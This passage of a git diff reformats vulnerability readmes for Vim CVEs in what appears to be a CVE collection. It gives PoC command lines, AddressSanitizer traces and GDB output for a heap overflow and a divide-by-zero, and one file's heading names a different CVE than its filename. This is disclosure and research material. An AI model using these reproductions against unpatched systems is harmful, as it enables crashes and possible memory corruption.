+ - https://nvd.nist.gov/vuln/detail/CVE-2021-3778
+ - https://www.openwall.com/lists/oss-security/2021/10/01/1
+ - https://huntr.dev/bounties/016ad2f2-07c1-4d14-a8ce-6eed10729365/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
+ cvss-score: 7.8
+ cve-id: CVE-2021-3778
+ cwe-id: CWE-787, CWE-122
+ cnvd-id: None
+ kve-id: None
 tags: 堆缓冲区溢出
\ No newline at end of file
diff --git a/cve/vim/2023/CVE-2023-0288/readme.md b/cve/vim/2023/CVE-2023-0288/readme.md
index 5ad3db9d..c7b58182 100644
--- a/cve/vim/2023/CVE-2023-0288/readme.md
+++ b/cve/vim/2023/CVE-2023-0288/readme.md
@@ -1,101 +1,101 @@
-#### 描述
-
-memline.c:2951处函数ml_append_int中基于堆的缓冲区溢出
-
-#### 影响版本
-
-```
-git log
-commit 043d7b2c84cda275354aa023b5769660ea70a168 (HEAD -> master, tag: v9.0.1182, origin/master, origin/HEAD)
-```
-
-#### Proof of Concept
-
-```
-./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_hbo02_s.dat -c :qa!
-=================================================================
-==11458==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x621000009d00 at pc 0x00000049950f bp 0x7ffcbaff3ef0 sp 0x7ffcbaff36b8
-READ of size 2147479553 at 0x621000009d00 thread T0
- #0 0x49950e in __asan_memmove (/home/fuzz/vim/src/vim+0x49950e)
- #1 0xabc5d7 in ml_append_int /home/fuzz/vim/src/memline.c:2951:6
- #2 0xa9b51f in ml_flush_line /home/fuzz/vim/src/memline.c:4109:9
- #3 0xab24bc in ml_append_flush /home/fuzz/vim/src/memline.c:3370:2
- #4 0xab2342 in ml_append_flags /home/fuzz/vim/src/memline.c:3415:12
- #5 0x117b44a in u_undoredo /home/fuzz/vim/src/undo.c:2821:7
- #6 0x117535b in u_doit /home/fuzz/vim/src/undo.c:2273:6
- #7 0x1174c1a in u_undo /home/fuzz/vim/src/undo.c:2214:5
- #8 0xbaad92 in nv_kundo /home/fuzz/vim/src/normal.c:4737:2
- #9 0xba3d19 in nv_undo /home/fuzz/vim/src/normal.c:4719:2
- #10 0xb6448b in normal_cmd /home/fuzz/vim/src/normal.c:939:5
- #11 0x83ea0e in exec_normal /home/fuzz/vim/src/ex_docmd.c:8887:6
- #12 0x83e238 in exec_normal_cmd /home/fuzz/vim/src/ex_docmd.c:8850:5
- #13 0x83dde9 in ex_normal /home/fuzz/vim/src/ex_docmd.c:8768:6
- #14 0x8060c1 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580:2
- #15 0x7f2ae5 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993:17
- #16 0xea1d75 in do_source_ext /home/fuzz/vim/src/scriptfile.c:1672:5
- #17 0xe9e7d6 in do_source /home/fuzz/vim/src/scriptfile.c:1818:12
- #18 0xe9e10c in cmd_source /home/fuzz/vim/src/scriptfile.c:1163:14
- #19 0xe9d7ee in ex_source /home/fuzz/vim/src/scriptfile.c:1189:2
- #20 0x8060c1 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580:2
- #21 0x7f2ae5 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993:17
- #22 0x7f7831 in do_cmdline_cmd /home/fuzz/vim/src/ex_docmd.c:587:12
- #23 0x14c4e12 in exe_commands /home/fuzz/vim/src/main.c:3146:2
- #24 0x14c0fae in vim_main2 /home/fuzz/vim/src/main.c:782:2
- #25 0x14b6449 in main /home/fuzz/vim/src/main.c:433:12
- #26 0x7f8319ce2082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
- #27 0x41eaad in _start (/home/fuzz/vim/src/vim+0x41eaad)
-
-0x621000009d00 is located 0 bytes to the right of 4096-byte region [0x621000008d00,0x621000009d00)
-allocated by thread T0 here:
- #0 0x499d0d in malloc (/home/fuzz/vim/src/vim+0x499d0d)
- #1 0x4cb3ea in lalloc /home/fuzz/vim/src/alloc.c:246:11
- #2 0x4cb2ca in alloc /home/fuzz/vim/src/alloc.c:151:12
- #3 0x14ce9f5 in mf_alloc_bhdr /home/fuzz/vim/src/memfile.c:884:21
- #4 0x14cd807 in mf_new /home/fuzz/vim/src/memfile.c:375:26
- #5 0xa98308 in ml_new_data /home/fuzz/vim/src/memline.c:4138:15
- #6 0xa96ca7 in ml_open /home/fuzz/vim/src/memline.c:391:15
- #7 0x503cd6 in open_buffer /home/fuzz/vim/src/buffer.c:192:9
- #8 0x14c265c in create_windows /home/fuzz/vim/src/main.c:2915:9
- #9 0x14c092d in vim_main2 /home/fuzz/vim/src/main.c:713:5
- #10 0x14b6449 in main /home/fuzz/vim/src/main.c:433:12
- #11 0x7f8319ce2082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
-
-SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/fuzz/vim/src/vim+0x49950e) in __asan_memmove
-Shadow bytes around the buggy address:
- 0x0c427fff9350: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
- 0x0c427fff9360: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
- 0x0c427fff9370: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
- 0x0c427fff9380: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
- 0x0c427fff9390: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-=>0x0c427fff93a0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
- 0x0c427fff93b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
- 0x0c427fff93c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
- 0x0c427fff93d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
- 0x0c427fff93e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
- 0x0c427fff93f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
-Shadow byte legend (one shadow byte represents 8 application bytes):
- Addressable: 00
- Partially addressable: 01 02 03 04 05 06 07
- Heap left redzone: fa
- Freed heap region: fd
- Stack left redzone: f1
- Stack mid redzone: f2
- Stack right redzone: f3
- Stack after return: f5
- Stack use after scope: f8
- Global redzone: f9
- Global init order: f6
- Poisoned by user: f7
- Container overflow: fc
- Array cookie: ac
- Intra object redzone: bb
- ASan internal: fe
- Left alloca redzone: ca
- Right alloca redzone: cb
- Shadow gap: cc
-==11458==ABORTING
-```
-
-#### 影响
-
+#### 描述
+
+memline.c:2951处函数ml_append_int中基于堆的缓冲区溢出
+
+#### 影响版本
+
+```
+git log
+commit 043d7b2c84cda275354aa023b5769660ea70a168 (HEAD -> master, tag: v9.0.1182, origin/master, origin/HEAD)
+```
+
+#### Proof of Concept
+
+```
+./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_hbo02_s.dat -c :qa!
+=================================================================
+==11458==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x621000009d00 at pc 0x00000049950f bp 0x7ffcbaff3ef0 sp 0x7ffcbaff36b8
+READ of size 2147479553 at 0x621000009d00 thread T0
+ #0 0x49950e in __asan_memmove (/home/fuzz/vim/src/vim+0x49950e)
+ #1 0xabc5d7 in ml_append_int /home/fuzz/vim/src/memline.c:2951:6
+ #2 0xa9b51f in ml_flush_line /home/fuzz/vim/src/memline.c:4109:9
+ #3 0xab24bc in ml_append_flush /home/fuzz/vim/src/memline.c:3370:2
+ #4 0xab2342 in ml_append_flags /home/fuzz/vim/src/memline.c:3415:12
+ #5 0x117b44a in u_undoredo /home/fuzz/vim/src/undo.c:2821:7
+ #6 0x117535b in u_doit /home/fuzz/vim/src/undo.c:2273:6
+ #7 0x1174c1a in u_undo /home/fuzz/vim/src/undo.c:2214:5
+ #8 0xbaad92 in nv_kundo /home/fuzz/vim/src/normal.c:4737:2
+ #9 0xba3d19 in nv_undo /home/fuzz/vim/src/normal.c:4719:2
+ #10 0xb6448b in normal_cmd /home/fuzz/vim/src/normal.c:939:5
+ #11 0x83ea0e in exec_normal /home/fuzz/vim/src/ex_docmd.c:8887:6
+ #12 0x83e238 in exec_normal_cmd /home/fuzz/vim/src/ex_docmd.c:8850:5
+ #13 0x83dde9 in ex_normal /home/fuzz/vim/src/ex_docmd.c:8768:6
+ #14 0x8060c1 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580:2
+ #15 0x7f2ae5 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993:17
+ #16 0xea1d75 in do_source_ext /home/fuzz/vim/src/scriptfile.c:1672:5
+ #17 0xe9e7d6 in do_source /home/fuzz/vim/src/scriptfile.c:1818:12
+ #18 0xe9e10c in cmd_source /home/fuzz/vim/src/scriptfile.c:1163:14
+ #19 0xe9d7ee in ex_source /home/fuzz/vim/src/scriptfile.c:1189:2
+ #20 0x8060c1 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580:2
+ #21 0x7f2ae5 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993:17
+ #22 0x7f7831 in do_cmdline_cmd /home/fuzz/vim/src/ex_docmd.c:587:12
+ #23 0x14c4e12 in exe_commands /home/fuzz/vim/src/main.c:3146:2
+ #24 0x14c0fae in vim_main2 /home/fuzz/vim/src/main.c:782:2
+ #25 0x14b6449 in main /home/fuzz/vim/src/main.c:433:12
+ #26 0x7f8319ce2082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
+ #27 0x41eaad in _start (/home/fuzz/vim/src/vim+0x41eaad)
+
+0x621000009d00 is located 0 bytes to the right of 4096-byte region [0x621000008d00,0x621000009d00)
+allocated by thread T0 here:
+ #0 0x499d0d in malloc (/home/fuzz/vim/src/vim+0x499d0d)
+ #1 0x4cb3ea in lalloc /home/fuzz/vim/src/alloc.c:246:11
+ #2 0x4cb2ca in alloc /home/fuzz/vim/src/alloc.c:151:12
+ #3 0x14ce9f5 in mf_alloc_bhdr /home/fuzz/vim/src/memfile.c:884:21
+ #4 0x14cd807 in mf_new /home/fuzz/vim/src/memfile.c:375:26
+ #5 0xa98308 in ml_new_data /home/fuzz/vim/src/memline.c:4138:15
+ #6 0xa96ca7 in ml_open /home/fuzz/vim/src/memline.c:391:15
+ #7 0x503cd6 in open_buffer /home/fuzz/vim/src/buffer.c:192:9
+ #8 0x14c265c in create_windows /home/fuzz/vim/src/main.c:2915:9
+ #9 0x14c092d in vim_main2 /home/fuzz/vim/src/main.c:713:5
+ #10 0x14b6449 in main /home/fuzz/vim/src/main.c:433:12
+ #11 0x7f8319ce2082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
+
+SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/fuzz/vim/src/vim+0x49950e) in __asan_memmove
+Shadow bytes around the buggy address:
+ 0x0c427fff9350: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0c427fff9360: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0c427fff9370: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0c427fff9380: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0c427fff9390: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+=>0x0c427fff93a0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c427fff93b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c427fff93c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c427fff93d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c427fff93e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c427fff93f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+Shadow byte legend (one shadow byte represents 8 application bytes):
+ Addressable: 00
+ Partially addressable: 01 02 03 04 05 06 07
+ Heap left redzone: fa
+ Freed heap region: fd
+ Stack left redzone: f1
+ Stack mid redzone: f2
+ Stack right redzone: f3
+ Stack after return: f5
+ Stack use after scope: f8
+ Global redzone: f9
+ Global init order: f6
+ Poisoned by user: f7
+ Container overflow: fc
+ Array cookie: ac
+ Intra object redzone: bb
+ ASan internal: fe
+ Left alloca redzone: ca
+ Right alloca redzone: cb
+ Shadow gap: cc
+==11458==ABORTING
+```
+
+#### 影响
+
 这个漏洞能够使软件崩溃,修改内存,并可能造成远程执行。
\ No newline at end of file
diff --git "a/cve/vim/2023/CVE-2023-0512/\346\274\217\346\264\236CVE-2023-0512.md" "b/cve/vim/2023/CVE-2023-0512/\346\274\217\346\264\236CVE-2023-0512.md"
index efca437f..30353200 100644
--- "a/cve/vim/2023/CVE-2023-0512/\346\274\217\346\264\236CVE-2023-0512.md"
+++ "b/cve/vim/2023/CVE-2023-0512/\346\274\217\346\264\236CVE-2023-0512.md"
@@ -1,108 +1,108 @@
-# 漏洞CVE-2023-0054
-## Description
-Divide By Zero in function adjust_skipcol at move.c:1978
-
-## Vim Version
-```shell
-git log
-commit 7193323b7796c05573f3aa89d422e848feb3a8dc (HEAD -> master, tag: v9.0.1223, origin/master, origin/HEAD)
-```
-
-## Proof of Concept
-```shell
-./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_dbz01_s.dat -c :qa!
-Floating point exception./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_dbz01_s.dat -c :qa!
-Floating point exception
-```
-
-# GDB
-
-```
-gdb --args ./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_dbz01_s.dat -c :qa!
-─── Output/messages ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
-[Thread debugging using libthread_db enabled]
-Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
-
-Program received signal SIGFPE, Arithmetic exception.
-0x0000555555f020d7 in adjust_skipcol () at move.c:1978
-1978 row += col / width2;
-─── Assembly ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
- 0x0000555555f020c4 adjust_skipcol+4025 mov $0x45c1,%edx
- 0x0000555555f020c9 adjust_skipcol+4030 mov 0xd54f20(%rip),%rax # 0x555556c56ff0
- 0x0000555555f020d0 adjust_skipcol+4037 mov %edx,%fs:(%rax)
- 0x0000555555f020d3 adjust_skipcol+4040 mov -0x2c(%rbp),%eax
- 0x0000555555f020d6 adjust_skipcol+4043 cltd
- 0x0000555555f020d7 adjust_skipcol+4044 idivl -0x20(%rbp)
- 0x0000555555f020da adjust_skipcol+4047 add %eax,-0x28(%rbp)
- 0x0000555555f020dd adjust_skipcol+4050 mov -0x2c(%rbp),%eax
- 0x0000555555f020e0 adjust_skipcol+4053 cltd
- 0x0000555555f020e1 adjust_skipcol+4054 idivl -0x20(%rbp)
-─── Breakpoints ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
-─── Expressions ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
-─── History ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
-─── Memory ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
-─── Registers ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────���───────────────────────────
- rax 0x0000000000000008 rbx 0x0000555556d8e320 rcx 0x0000555556d968f8 rdx 0x0000000000000000 rsi 0x0000000000000000 rdi 0x0000000000000000
- rbp 0x00007fffffff8e80 rsp 0x00007fffffff8e50 r8 0x0000000000000007 r9 0x000062100002e0ff r10 0x00007ffff65a1000 r11 0x00000000000000f8
- r12 0x00000000fffffff8 r13 0x00000ffffffff1fa r14 0x00007fffffff8fd0 r15 0x00007fffffffb750 rip 0x0000555555f020d7 eflags [ IF RF ]
- cs 0x00000033 ss 0x0000002b ds 0x00000000 es 0x00000000 fs 0x00000000 gs 0x00000000
-─── Source ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
- 1973 col -= width1;
- 1974 ++row;
- 1975 }
- 1976 if (col > width2)
- 1977 {
- 1978 row += col / width2;
- 1979 col = col % width2;
- 1980 }
- 1981 if (row >= curwin->w_height)
- 1982 {
-─── Stack ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
-[0] from 0x0000555555f020d7 in adjust_skipcol+4044 at move.c:1978
-[1] from 0x00005555558e44b0 in beginline+1831 at edit.c:2642
-[2] from 0x0000555555a741c4 in do_ecmd+35847 at ex_cmds.c:3167
-[3] from 0x0000555555b0626f in do_exedit+4927 at ex_docmd.c:7187
-[4] from 0x0000555555b01393 in ex_splitview+5888 at ex_docmd.c:6834
-[5] from 0x0000555555abd910 in do_one_cmd+59345 at ex_docmd.c:2580
-[6] from 0x0000555555aa5e4a in do_cmdline+16990 at ex_docmd.c:993
-[7] from 0x0000555555aa1bbd in do_cmdline_cmd+43 at ex_docmd.c:587
-[8] from 0x00005555568f8e11 in do_window+5838 at window.c:274
-[9] from 0x0000555555f71e34 in nv_window+730 at normal.c:5614
-[+]
-─── Threads ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
-[1] id 2116628 name vim from 0x0000555555f020d7 in adjust_skipcol+4044 at move.c:1978
-─── Variables ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
-loc width1 = -8, width2 = 0, so = 0, scrolloff_cols = 0, scrolled = 0, col = 8, row = 1
-──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
->>> bt
-#0 0x0000555555f020d7 in adjust_skipcol () at move.c:1978
-#1 0x00005555558e44b0 in beginline (flags=6) at edit.c:2642
-#2 0x0000555555a741c4 in do_ecmd (fnum=0, ffname=0x0, sfname=0x0, eap=0x7fffffffb410, newlnum=1, flags=1, oldwin=0x0) at ex_cmds.c:3167
-#3 0x0000555555b0626f in do_exedit (eap=0x7fffffffb410, old_curwin=0x625000023100) at ex_docmd.c:7187
-#4 0x0000555555b01393 in ex_splitview (eap=0x7fffffffb410) at ex_docmd.c:6834
-#5 0x0000555555abd910 in do_one_cmd (cmdlinep=0x7fffffffb780, flags=11, cstack=0x7fffffffb8a0, fgetline=0x0, cookie=0x0) at ex_docmd.c:2580
-#6 0x0000555555aa5e4a in do_cmdline (cmdline=0x7fffffffc090 "new", fgetline=0x0, cookie=0x0, flags=11) at ex_docmd.c:993
-#7 0x0000555555aa1bbd in do_cmdline_cmd (cmd=0x7fffffffc090 "new") at ex_docmd.c:587
-#8 0x00005555568f8e11 in do_window (nchar=14, Prenum=0, xchar=0) at window.c:274
-#9 0x0000555555f71e34 in nv_window (cap=0x7fffffffc210) at normal.c:5614
-#10 0x0000555555f28ab7 in normal_cmd (oap=0x7fffffffc330, toplevel=1) at normal.c:938
-#11 0x0000555555b1b123 in exec_normal (was_typed=0, use_vpeekc=0, may_use_terminal_loop=0) at ex_docmd.c:8887
-#12 0x0000555555b1aab8 in exec_normal_cmd (cmd=0x611000000b88 "0", remap=0, silent=0) at ex_docmd.c:8850
-#13 0x0000555555b19a00 in ex_normal (eap=0x7fffffffc710) at ex_docmd.c:8768
-#14 0x0000555555abd910 in do_one_cmd (cmdlinep=0x7fffffffca80, flags=7, cstack=0x7fffffffcba0, fgetline=0x555556341b6c , cookie=0x7fffffffd470) at ex_docmd.c:2580
-#15 0x0000555555aa5e4a in do_cmdline (cmdline=0x611000000540 "wi0 0", fgetline=0x555556341b6c , cookie=0x7fffffffd470, flags=7) at ex_docmd.c:993
-#16 0x000055555633a828 in do_source_ext (fname=0x603000000e23 "./poc_dbz01_s.dat", check_other=0, is_vimrc=0, ret_sid=0x0, eap=0x0, clearvars=0) at scriptfile.c:1672
-#17 0x000055555633d027 in do_source (fname=0x603000000e23 "./poc_dbz01_s.dat", check_other=0, is_vimrc=0, ret_sid=0x0) at scriptfile.c:1818
-#18 0x000055555633571a in cmd_source (fname=0x603000000e23 "./poc_dbz01_s.dat", eap=0x7fffffffd6d0) at scriptfile.c:1163
-#19 0x0000555556335873 in ex_source (eap=0x7fffffffd6d0) at scriptfile.c:1189
-#20 0x0000555555abd910 in do_one_cmd (cmdlinep=0x7fffffffda40, flags=11, cstack=0x7fffffffdb60, fgetline=0x0, cookie=0x0) at ex_docmd.c:2580
-#21 0x0000555555aa5e4a in do_cmdline (cmdline=0x603000000af0 "so ./poc_dbz01_s.dat", fgetline=0x0, cookie=0x0, flags=11) at ex_docmd.c:993
-#22 0x0000555555aa1bbd in do_cmdline_cmd (cmd=0x603000000af0 "so ./poc_dbz01_s.dat") at ex_docmd.c:587
-#23 0x0000555556adbcd1 in exe_commands (parmp=0x555556d8d460 ) at main.c:3146
-#24 0x0000555556ac5d79 in vim_main2 () at main.c:782
-#25 0x0000555556ac3251 in main (argc=15, argv=0x7fffffffe438) at main.c:433
-```
-
-## Impact
-
+# 漏洞CVE-2023-0054
+## Description
+Divide By Zero in function adjust_skipcol at move.c:1978
+
+## Vim Version
+```shell
+git log
+commit 7193323b7796c05573f3aa89d422e848feb3a8dc (HEAD -> master, tag: v9.0.1223, origin/master, origin/HEAD)
+```
+
+## Proof of Concept
+```shell
+./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_dbz01_s.dat -c :qa!
+Floating point exception./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_dbz01_s.dat -c :qa!
+Floating point exception
+```
+
+# GDB
+
+```
+gdb --args ./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_dbz01_s.dat -c :qa!
+─── Output/messages ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+[Thread debugging using libthread_db enabled]
+Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
+
+Program received signal SIGFPE, Arithmetic exception.
+0x0000555555f020d7 in adjust_skipcol () at move.c:1978
+1978 row += col / width2;
+─── Assembly ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+ 0x0000555555f020c4 adjust_skipcol+4025 mov $0x45c1,%edx
+ 0x0000555555f020c9 adjust_skipcol+4030 mov 0xd54f20(%rip),%rax # 0x555556c56ff0
+ 0x0000555555f020d0 adjust_skipcol+4037 mov %edx,%fs:(%rax)
+ 0x0000555555f020d3 adjust_skipcol+4040 mov -0x2c(%rbp),%eax
+ 0x0000555555f020d6 adjust_skipcol+4043 cltd
+ 0x0000555555f020d7 adjust_skipcol+4044 idivl -0x20(%rbp)
+ 0x0000555555f020da adjust_skipcol+4047 add %eax,-0x28(%rbp)
+ 0x0000555555f020dd adjust_skipcol+4050 mov -0x2c(%rbp),%eax
+ 0x0000555555f020e0 adjust_skipcol+4053 cltd
+ 0x0000555555f020e1 adjust_skipcol+4054 idivl -0x20(%rbp)
+─── Breakpoints ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+─── Expressions ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+─── History ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+─── Memory ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+─── Registers ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────���───────────────────────────
+ rax 0x0000000000000008 rbx 0x0000555556d8e320 rcx 0x0000555556d968f8 rdx 0x0000000000000000 rsi 0x0000000000000000 rdi 0x0000000000000000
+ rbp 0x00007fffffff8e80 rsp 0x00007fffffff8e50 r8 0x0000000000000007 r9 0x000062100002e0ff r10 0x00007ffff65a1000 r11 0x00000000000000f8
+ r12 0x00000000fffffff8 r13 0x00000ffffffff1fa r14 0x00007fffffff8fd0 r15 0x00007fffffffb750 rip 0x0000555555f020d7 eflags [ IF RF ]
+ cs 0x00000033 ss 0x0000002b ds 0x00000000 es 0x00000000 fs 0x00000000 gs 0x00000000
+─── Source ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+ 1973 col -= width1;
+ 1974 ++row;
+ 1975 }
+ 1976 if (col > width2)
+ 1977 {
+ 1978 row += col / width2;
+ 1979 col = col % width2;
+ 1980 }
+ 1981 if (row >= curwin->w_height)
+ 1982 {
+─── Stack ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+[0] from 0x0000555555f020d7 in adjust_skipcol+4044 at move.c:1978
+[1] from 0x00005555558e44b0 in beginline+1831 at edit.c:2642
+[2] from 0x0000555555a741c4 in do_ecmd+35847 at ex_cmds.c:3167
+[3] from 0x0000555555b0626f in do_exedit+4927 at ex_docmd.c:7187
+[4] from 0x0000555555b01393 in ex_splitview+5888 at ex_docmd.c:6834
+[5] from 0x0000555555abd910 in do_one_cmd+59345 at ex_docmd.c:2580
+[6] from 0x0000555555aa5e4a in do_cmdline+16990 at ex_docmd.c:993
+[7] from 0x0000555555aa1bbd in do_cmdline_cmd+43 at ex_docmd.c:587
+[8] from 0x00005555568f8e11 in do_window+5838 at window.c:274
+[9] from 0x0000555555f71e34 in nv_window+730 at normal.c:5614
+[+]
+─── Threads ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+[1] id 2116628 name vim from 0x0000555555f020d7 in adjust_skipcol+4044 at move.c:1978
+─── Variables ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+loc width1 = -8, width2 = 0, so = 0, scrolloff_cols = 0, scrolled = 0, col = 8, row = 1
+──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+>>> bt
+#0 0x0000555555f020d7 in adjust_skipcol () at move.c:1978
+#1 0x00005555558e44b0 in beginline (flags=6) at edit.c:2642
+#2 0x0000555555a741c4 in do_ecmd (fnum=0, ffname=0x0, sfname=0x0, eap=0x7fffffffb410, newlnum=1, flags=1, oldwin=0x0) at ex_cmds.c:3167
+#3 0x0000555555b0626f in do_exedit (eap=0x7fffffffb410, old_curwin=0x625000023100) at ex_docmd.c:7187
+#4 0x0000555555b01393 in ex_splitview (eap=0x7fffffffb410) at ex_docmd.c:6834
+#5 0x0000555555abd910 in do_one_cmd (cmdlinep=0x7fffffffb780, flags=11, cstack=0x7fffffffb8a0, fgetline=0x0, cookie=0x0) at ex_docmd.c:2580
+#6 0x0000555555aa5e4a in do_cmdline (cmdline=0x7fffffffc090 "new", fgetline=0x0, cookie=0x0, flags=11) at ex_docmd.c:993
+#7 0x0000555555aa1bbd in do_cmdline_cmd (cmd=0x7fffffffc090 "new") at ex_docmd.c:587
+#8 0x00005555568f8e11 in do_window (nchar=14, Prenum=0, xchar=0)
at window.c:274 +#9 0x0000555555f71e34 in nv_window (cap=0x7fffffffc210) at normal.c:5614 +#10 0x0000555555f28ab7 in normal_cmd (oap=0x7fffffffc330, toplevel=1) at normal.c:938 +#11 0x0000555555b1b123 in exec_normal (was_typed=0, use_vpeekc=0, may_use_terminal_loop=0) at ex_docmd.c:8887 +#12 0x0000555555b1aab8 in exec_normal_cmd (cmd=0x611000000b88 "0", remap=0, silent=0) at ex_docmd.c:8850 +#13 0x0000555555b19a00 in ex_normal (eap=0x7fffffffc710) at ex_docmd.c:8768 +#14 0x0000555555abd910 in do_one_cmd (cmdlinep=0x7fffffffca80, flags=7, cstack=0x7fffffffcba0, fgetline=0x555556341b6c , cookie=0x7fffffffd470) at ex_docmd.c:2580 +#15 0x0000555555aa5e4a in do_cmdline (cmdline=0x611000000540 "wi0 0", fgetline=0x555556341b6c , cookie=0x7fffffffd470, flags=7) at ex_docmd.c:993 +#16 0x000055555633a828 in do_source_ext (fname=0x603000000e23 "./poc_dbz01_s.dat", check_other=0, is_vimrc=0, ret_sid=0x0, eap=0x0, clearvars=0) at scriptfile.c:1672 +#17 0x000055555633d027 in do_source (fname=0x603000000e23 "./poc_dbz01_s.dat", check_other=0, is_vimrc=0, ret_sid=0x0) at scriptfile.c:1818 +#18 0x000055555633571a in cmd_source (fname=0x603000000e23 "./poc_dbz01_s.dat", eap=0x7fffffffd6d0) at scriptfile.c:1163 +#19 0x0000555556335873 in ex_source (eap=0x7fffffffd6d0) at scriptfile.c:1189 +#20 0x0000555555abd910 in do_one_cmd (cmdlinep=0x7fffffffda40, flags=11, cstack=0x7fffffffdb60, fgetline=0x0, cookie=0x0) at ex_docmd.c:2580 +#21 0x0000555555aa5e4a in do_cmdline (cmdline=0x603000000af0 "so ./poc_dbz01_s.dat", fgetline=0x0, cookie=0x0, flags=11) at ex_docmd.c:993 +#22 0x0000555555aa1bbd in do_cmdline_cmd (cmd=0x603000000af0 "so ./poc_dbz01_s.dat") at ex_docmd.c:587 +#23 0x0000555556adbcd1 in exe_commands (parmp=0x555556d8d460 ) at main.c:3146 +#24 0x0000555556ac5d79 in vim_main2 () at main.c:782 +#25 0x0000555556ac3251 in main (argc=15, argv=0x7fffffffe438) at main.c:433 +``` + +## Impact + This vulnerability is capable of crashing software, modify memory, and possible remote 
execution.
\ No newline at end of file
diff --git a/cve/vim/2023/CVE-2023-1175/README.md b/cve/vim/2023/CVE-2023-1175/README.md
index eba25fc4..56e610cd 100644
--- a/cve/vim/2023/CVE-2023-1175/README.md
+++ b/cve/vim/2023/CVE-2023-1175/README.md
@@ -1,134 +1,134 @@
-## Description
-Incorrect Calculation of Buffer Size in function yank_copy_line at register.c:1468
-## vim version
-```bash
-git log
-commit 657aea7fc47fb919ce76fad64ba0ec55a1af80f1 (HEAD -> master, tag: v9.0.1249, origin/master, origin/HEAD)
-```
-## POC
